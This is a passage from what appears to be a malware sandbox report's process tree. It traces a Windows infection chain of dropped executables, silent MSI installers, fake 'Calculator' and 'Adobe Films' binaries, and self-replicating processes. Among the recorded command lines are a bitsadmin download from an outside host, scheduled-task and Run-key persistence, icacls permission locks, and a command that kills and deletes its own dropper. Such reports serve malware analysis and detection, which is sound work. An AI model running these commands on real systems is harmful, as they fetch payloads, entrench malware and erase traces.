                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\b2-27241-7f3-18593-84a570bdd34da\Kakanenytae.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\b2-27241-7f3-18593-84a570bdd34da\Kakanenytae.exe"
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:5304
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fgifpcqz.fj3\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:5632
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\fgifpcqz.fj3\GcleanerEU.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\fgifpcqz.fj3\GcleanerEU.exe /eufive
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:4948
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\505bmx3m.5lz\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:344
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\505bmx3m.5lz\installer.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\505bmx3m.5lz\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                  PID:6148
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\505bmx3m.5lz\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\505bmx3m.5lz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634658802 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:8584
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nzubdjhm.ceh\any.exe & exit
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:5468
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\nzubdjhm.ceh\any.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\nzubdjhm.ceh\any.exe
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:6264
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2pvqxgu2.3dj\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:424
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2pvqxgu2.3dj\gcleaner.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\2pvqxgu2.3dj\gcleaner.exe /mixfive
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:6336
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hvuzdw4f.erh\autosubplayer.exe /S & exit
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:5640
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\hvuzdw4f.erh\autosubplayer.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\hvuzdw4f.erh\autosubplayer.exe /S
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                          PID:6432
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                              PID:6356
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:7056
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:8592
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:9028
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                      PID:6980
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                        PID:5712
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgF266.tmp\tempfile.ps1"
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                          PID:3212
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                          "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                          • Download via BitsAdmin
                                                                                                                                                                                                                                          PID:8420
                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\S8LGJghE7EKxPiR6DNQktZgV.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\S8LGJghE7EKxPiR6DNQktZgV.exe"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              PID:2140
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                PID:5132
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                  PID:5552
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0xbc,0xc0,0x1c4,0xb8,0x1e8,0x7ffbdd09dec0,0x7ffbdd09ded0,0x7ffbdd09dee0
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    PID:1844
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --mojo-platform-channel-handle=1768 /prefetch:8
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    PID:6580
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1716 /prefetch:2
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    PID:5624
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --mojo-platform-channel-handle=2140 /prefetch:8
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    PID:5708
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2516 /prefetch:1
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    PID:5612
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2496 /prefetch:1
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    PID:5628
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --mojo-platform-channel-handle=1760 /prefetch:8
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    PID:4268
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --mojo-platform-channel-handle=2728 /prefetch:8
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    PID:6176
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2960 /prefetch:2
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:6248
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --mojo-platform-channel-handle=3560 /prefetch:8
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:6232
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,9867026929654739109,15457096068662809124,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5552_2074954330" --mojo-platform-channel-handle=3192 /prefetch:8
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:5656
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8A71.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8A71.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:4520
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8A71.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\8A71.exe
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                      PID:2164
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C9E7.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\C9E7.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                    PID:4668
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F190.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F190.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                    PID:5812
                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:6068
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9CC.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9CC.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:5048
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:5792
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:1200
                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                          schtasks.exe /create /tn "build" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1634221883\build.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                          PID:5100
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                          PID:5488
                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                          PID:5764
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\CA7D.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\CA7D.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:5844
                                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                          PID:6396
                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 431FE157C0E32D0251951062DF69A907 C
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            PID:4580
                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding B7375794B221769BCEC123186368BF24
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:8680
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                PID:8912
                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 66C98483DA9D950172B62405CD56EE78 E Global\MSI0000
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:5392
                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:7160
                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:6608
                                                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20211022-1608.dm
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5920
                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                    schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\rastlsext\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                    PID:7140
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\8EED.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\8EED.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                    PID:1356
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8EED.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\8EED.exe
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                      PID:7976
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                        icacls "C:\Users\Admin\AppData\Local\fe059447-cd3e-4d30-b78a-a08e44fc527e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                        PID:5184
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\8EED.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\8EED.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                        PID:8532
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8EED.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\8EED.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:8672
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\8045799c-5cc9-4612-8162-c6b5fa9b8ebe\build2.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\8045799c-5cc9-4612-8162-c6b5fa9b8ebe\build2.exe"
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                              PID:9172
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\8045799c-5cc9-4612-8162-c6b5fa9b8ebe\build2.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\8045799c-5cc9-4612-8162-c6b5fa9b8ebe\build2.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                PID:812
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\8045799c-5cc9-4612-8162-c6b5fa9b8ebe\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                  PID:7160
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                    taskkill /im build2.exe /f
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                    PID:2224
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                    PID:2976
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\8045799c-5cc9-4612-8162-c6b5fa9b8ebe\build3.exe
